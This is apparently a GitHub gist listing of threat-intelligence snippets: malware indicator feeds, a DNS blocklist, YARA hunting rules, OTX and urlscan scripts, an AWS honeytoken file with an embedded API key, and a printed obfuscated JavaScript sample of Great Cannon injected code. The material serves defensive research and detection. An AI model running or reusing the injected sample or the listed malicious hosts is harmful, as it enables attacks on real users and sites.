Skip to content

Instantly share code, notes, and snippets.

View cado_lambda.py
import json
import urllib3
import requests
import datetime
import random
import string
import logging
def lambda_handler(event, context):
@chrisdoman
chrisdoman / TestFeed.csv
Last active Mar 27, 2020
Test Feed for MISP
View TestFeed.csv
We can't make this file beautiful and searchable because it's too large.
indicator,indicator_type,pulse_title,pulse_author,tlp
ihracat.myq-see.com,hostname,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white
phantom101.duckdns.org,hostname,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white
goodattack.duckdns.org,hostname,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white
http://www.tempinfo.96.lt/wras/savekey.php,url,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white
http://www.tempinfo.96.lt/wras/createkeys.php,url,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white
http://www.tempinfo.96.lt/wras/RANSOM20.jpg,url,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white
www.tempinfo.96.lt,hostname,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white
2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326,file,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white
View aws_credentials_honeytoken
[default]
aws_access_key_id = AKIAXYZDQCENYTNALZP5
aws_secret_access_key = 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
output = json
region = us-east-2
* This is just a honey token to detect automated scanners looking for AWS keys - this is not a real AWS account! *
@chrisdoman
chrisdoman / otx_blocklist.rpz
Created Sep 17, 2019
Sample RPZ blocklist from OTX
View otx_blocklist.rpz
This file has been truncated, but you can view the full file.
differentia.ru CNAME .
*.differentia.ru CNAME .
disorderstatus.ru CNAME .
*.disorderstatus.ru CNAME .
gvaq70s7he.ru CNAME .
*.gvaq70s7he.ru CNAME .
atomictrivia.ru CNAME .
*.atomictrivia.ru CNAME .
4nbizac8.ru CNAME .
View get_otx_domains_to_rpz.py
# Short demonstration script to write OTX hostnames to a RPZ format text-file
from OTXv2 import OTXv2
import os
# This is the API key for the user "api_example"
otx = OTXv2('766ba1df3ab54db9c0fcbf62ef048c3a04c260e8ca65b6c25346084b7b4719ad')
events = otx.get_all_indicators(author_name='alienvault')
output = ''
View cannon.rule
rule hunt_great_cannon {
strings:
$ = "requesttime_list" nocase wide ascii
$ = "responsetime_list" nocase wide ascii
$ = "cloudflare_js_validate_url" nocase wide ascii
$ = "116.255.226.154" nocase wide ascii
$ = "responsetime-requesttime>TIMEGAP" nocase wide ascii
condition:
any of them
}
@chrisdoman
chrisdoman / cannon_samples.js
Created Sep 2, 2019
Samples from the Great Cannon
View cannon_samples.js
var _a="(,& vXh)C;sf<H8O1J|iRY9dj?G%m4}n_M'pQZkFyaEP=Ko2/\\x]!cquSV.57B^lW*Utr{z+N-ADg>[we0b\"I6:TL3",_b="^JL,qMP(*IjReDE<xiQYo{tp>8!-[W&hOcbv12Fn\".%4Ks=5 Z]Cl'uXfAHrdGaN/9}zg\\+U6|kSV:;wmyB7T)_03?",_c="DjOx.}S=Q's_\"I:]c[E(g/JG)k!2yY,zBV4>PFu9rp;N1i<%ZUM*?0K5^nX 8td{LAmH6hbolv&\\a7-ReCq|fw+3TW";eval(function(_,b,a,c,n,r){if(n=function(_){return(_<62?"":n(parseInt(_/62)))+((_%=62)>35?String[_a[11]+_c[40]+_b[20]+_c[66]+_b[51]+_a[6]+_b[62]+_c[40]+_b[51]+_b[20]+_c[62]+_b[12]](_+29):_[_c[61]+_c[71]+_a[56]+_c[61]+_a[68]+_a[19]+_c[57]+_b[68]](36))},0==_a[81][_a[68]+_b[12]+_b[23]+_b[52]+_b[62]+_a[53]+_c[80]](0,n)){for(;a--;)r[n(a)]=c[a];c=[function(_){return r[_]||_}],n=function(){return _c[17]+_c[27]+_b[27]+_a[22]+_a[82]+_b[33]+_c[80]+_a[73]+_a[10]+_a[55]+_c[78]+_a[70]+_a[74]+_c[78]+_a[37]+_c[15]},a=1}for(;a--;)c[a]&&(_=_[_c[40]+_a[80]+_b[23]+_b[52]+_b[62]+_a[53]+_b[12]](new RegExp(_a[49]+_a[82]+n(a)+(_b[69]+_a[82]),_a[76]),c[a]));return _}(_c[27]+_c[59]+_b[84]+_c[65]+_b[75]+_a[45]+_b[9]+_c[0]+_a[44]+_a[89]+_b[88]
View getUrlScanGreatCannonHits.py
'''
Gets possible Great Cannon injections from UrlScan
'''
import requests
import json
# Insert your urlscan API Key
api_key = ''
@chrisdoman
chrisdoman / malware.rules
Created Oct 1, 2018
Autogenerated Rules
View malware.rules
This file has been truncated, but you can view the full file.
/*
Yara rules to identify malware families, made by Yabin
Auto-generated - plenty of these rules won't work as they rely on looking for compiled code
*/
rule BackdoorAndroidOSCoca_51dc097980b46d053085ff079b153f107d866a27dc19670b79928ec55ab336d7 {
strings:
@chrisdoman
chrisdoman / Reports.csv
Last active Aug 13, 2020
Example APT Reports Pulled from OTX
View Reports.csv
We can make this file beautiful and searchable if this error is corrected: It looks like row 7 should actually have columns, instead of 1. in line 6.
title,reference,created
Continued PassCV Malware,https://drive.google.com/file/d/1pzZT7Stig6i8hTqjxUUgxDSmGEJ7W9ak/view,2018-08-06
Blackgear Cyberespionage Campaign Resurfaces Abuses Social Media for C and C Communication,https://blog.trendmicro.com/trendlabs-security-intelligence/blackgear-cyberespionage-campaign-resurfaces-abuses-social-media-for-cc-communication/,2018-07-18
Golden Rat long-term espionage campaign in Syria is still ongoing,http://csecybsec.com/download/zlab/20180723_CSE_APT27_Syria_v1.pdf,2018-07-23
Chinese Espionage Group TEMP.Periscope Targets Cambodia Ahead of July 2018 Elections and Reveals Broad Operations Globally,https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html,2018-07-11
Certificates stolen from Taiwanese tech-companies misused in Plead malware campaign,https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/,2018-07-09
NavRAT Uses US-North Korea Summit As Decoy